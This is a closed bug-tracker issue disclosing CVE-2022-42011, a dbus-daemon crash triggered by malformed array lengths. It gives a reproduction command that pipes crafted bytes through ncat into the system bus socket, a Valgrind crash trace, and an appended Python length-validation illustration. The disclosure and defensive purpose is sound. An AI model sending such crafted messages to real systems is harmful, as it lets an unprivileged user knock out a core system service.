Status: Closed

Issue created Sep 07, 2022 by Evgeny Vereshchagin (@evverx), Contributor

CVE-2022-42011: dbus-daemon can be crashed by messages with array length inconsistent with element type

To reproduce

It can be reproduced on Debian Bookworm with dbus-daemon-1.14.0-2 by running the following command as a non-root user:

cat <<'EOL' | xxd -ps -r | ncat -U /run/dbus/system_bus_socket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EOL

Expected result

dbus-daemon shouldn't crash.

Actual result

==29956== Invalid read of size 8
==29956==    at 0x4888CF4: UnknownInlinedFun (byteswap.h:73)
==29956==    by 0x4888CF4: _dbus_marshal_read_basic (dbus-marshal-basic.c:582)
==29956==    by 0x48738DC: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2612)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x4873BD7: _dbus_type_writer_write_reader_partial.isra.0 (dbus-marshal-recursive.c:2698)
==29956==    by 0x4873D17: replacement_block_replace (dbus-marshal-recursive.c:1197)
==29956==    by 0x4873EDD: _dbus_type_reader_delete (dbus-marshal-recursive.c:1434)
==29956==    by 0x4871F43: _dbus_header_remove_unknown_fields (dbus-marshal-header.c:1559)
==29956==  Address 0x5005300 is 0 bytes after a block of size 608 alloc'd
==29956==    at 0x484582F: realloc (vg_replace_malloc.c:1437)
==29956==    by 0x4889454: reallocate_for_length (dbus-string.c:397)
==29956==    by 0x4889454: set_length (dbus-string.c:438)
==29956==    by 0x4871F30: reserve_header_padding (dbus-marshal-header.c:100)
==29956==    by 0x4871F30: _dbus_header_remove_unknown_fields (dbus-marshal-header.c:1556)
==29956==    by 0x11FA4F: bus_dispatch (dispatch.c:293)
==29956==    by 0x11FA4F: bus_dispatch_message_filter (dispatch.c:559)
==29956==    by 0x486C9C6: dbus_connection_dispatch (dbus-connection.c:4703)
==29956==    by 0x486C9C6: dbus_connection_dispatch (dbus-connection.c:4574)
==29956==    by 0x12BE98: _dbus_loop_dispatch (dbus-mainloop.c:532)
==29956==    by 0x12BE98: _dbus_loop_dispatch (dbus-mainloop.c:513)
==29956==    by 0x12BE98: _dbus_loop_iterate (dbus-mainloop.c:862)
==29956==    by 0x12C274: _dbus_loop_run (dbus-mainloop.c:888)
==29956==    by 0x112C99: main (main.c:750)
==29956==
==29956==
==29956== Process terminating with default action of signal 11 (SIGSEGV): dumping core
==29956==  Access not within mapped region at address 0x5356000
==29956==    at 0x4888CF4: UnknownInlinedFun (byteswap.h:73)
==29956==    by 0x4888CF4: _dbus_marshal_read_basic (dbus-marshal-basic.c:582)
==29956==    by 0x48738DC: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2612)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x48737E6: writer_write_reader_helper.isra.0 (dbus-marshal-recursive.c:2526)
==29956==    by 0x4873BD7: _dbus_type_writer_write_reader_partial.isra.0 (dbus-marshal-recursive.c:2698)
==29956==    by 0x4873D17: replacement_block_replace (dbus-marshal-recursive.c:1197)
==29956==    by 0x4873EDD: _dbus_type_reader_delete (dbus-marshal-recursive.c:1434)
==29956==    by 0x4871F43: _dbus_header_remove_unknown_fields (dbus-marshal-header.c:1559)

[I've edited the title of this issue report to clarify the scope of the initial issue reported by @evverx and distinguish it from #418 (closed). -@smcv]

Edited Oct 02, 2022 by Simon McVittie
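The inconsistency the title describes, as an added illustration that is not dbus's own validation code: a check that rejects a marshalled array of fixed-size elements whose byte length is not a multiple of the element size (so a reader would otherwise walk past the end of the buffer). Element sizes and alignment follow the D-Bus wire format specification; the byte buffers are constructed samples, and the function name is an assumption.

```python
import struct

# Marshalled size in bytes of each fixed-size D-Bus basic type (spec values).
FIXED_SIZES = {"y": 1, "b": 4, "n": 2, "q": 2, "i": 4, "u": 4,
               "x": 8, "t": 8, "d": 8, "h": 4}
MAX_ARRAY_BYTES = 1 << 26  # spec: arrays may not exceed 2^26 bytes


def _align(offset, alignment):
    return (offset + alignment - 1) // alignment * alignment


def check_fixed_array(buf, offset, element_type, little_endian=True):
    """Validate one marshalled array of fixed-size elements at `offset`.

    Returns (ok, reason, end_offset). Only the length/size consistency is
    checked here; element values are not interpreted.
    """
    if element_type not in FIXED_SIZES:
        return False, "not a fixed-size element type", offset
    size = FIXED_SIZES[element_type]
    offset = _align(offset, 4)  # the UINT32 length field is 4-aligned
    if offset + 4 > len(buf):
        return False, "array length field runs past end of message", offset
    (length,) = struct.unpack_from("<I" if little_endian else ">I", buf, offset)
    offset += 4
    elems_start = _align(offset, size)  # elements are padded to their own alignment
    if length > MAX_ARRAY_BYTES:
        return False, "array length exceeds the 2^26-byte maximum", elems_start
    if length % size != 0:
        # A reader that computes the element count as ceil(length/size)
        # would read past the declared array body; reject the message.
        return False, (f"array length {length} is not a multiple of "
                       f"element size {size}"), elems_start
    if elems_start + length > len(buf):
        return False, "array body runs past end of message", elems_start
    return True, "ok", elems_start + length


# Constructed sample: well-formed 'at' array of two uint64 values.
GOOD_T_ARRAY = struct.pack("<I", 16) + b"\0" * 4 + struct.pack("<QQ", 1, 2)
# Constructed sample: 'at' array whose declared length (12) is not a
# multiple of the 8-byte element size.
BAD_T_ARRAY = struct.pack("<I", 12) + b"\0" * 4 + b"\0" * 12

if __name__ == "__main__":
    print(check_fixed_array(GOOD_T_ARRAY, 0, "t"))
    print(check_fixed_array(BAD_T_ARRAY, 0, "t"))
```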